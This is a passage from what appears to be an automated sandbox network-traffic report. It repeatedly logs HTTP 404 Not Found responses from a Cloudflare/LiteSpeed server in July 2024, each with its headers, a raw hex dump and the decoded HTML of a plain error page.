3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:33:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ywN6Klh2QZISVdPV%2FP0Kvhcx%2FM%2BEnWHvEgjrqN9RVOR4iVtoEXsr%2F4k%2F5AabKo43QWOeG7WuksXSkx8JOJ5OxO8z%2BI4E1l7IuiW0exOKpunvnNCf84lswdjQPBkmPr%2FG3c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a8cdda5e9e30f98-EWRalt-svc: h3=":443"; ma=86400Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 25 Jul 2024 14:33:34 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ywN6Klh2QZISVdPV%2FP0Kvhcx%2FM%2BEnWHvEgjrqN9RVOR4iVtoEXsr%2F4k%2F5AabKo43QWOeG7WuksXSkx8JOJ5OxO8z%2BI4E1l7IuiW0exOKpunvnNCf84lswdjQPBkmPr%2FG3c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a8cdda5e9e30f98-EWRalt-svc: h3=":443"; ma=86400Data Raw: 33 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b Data Ascii: 31c<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 14:33:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 14:33:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 14:33:59 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 14:34:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 25 Jul 2024 14:34:04 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 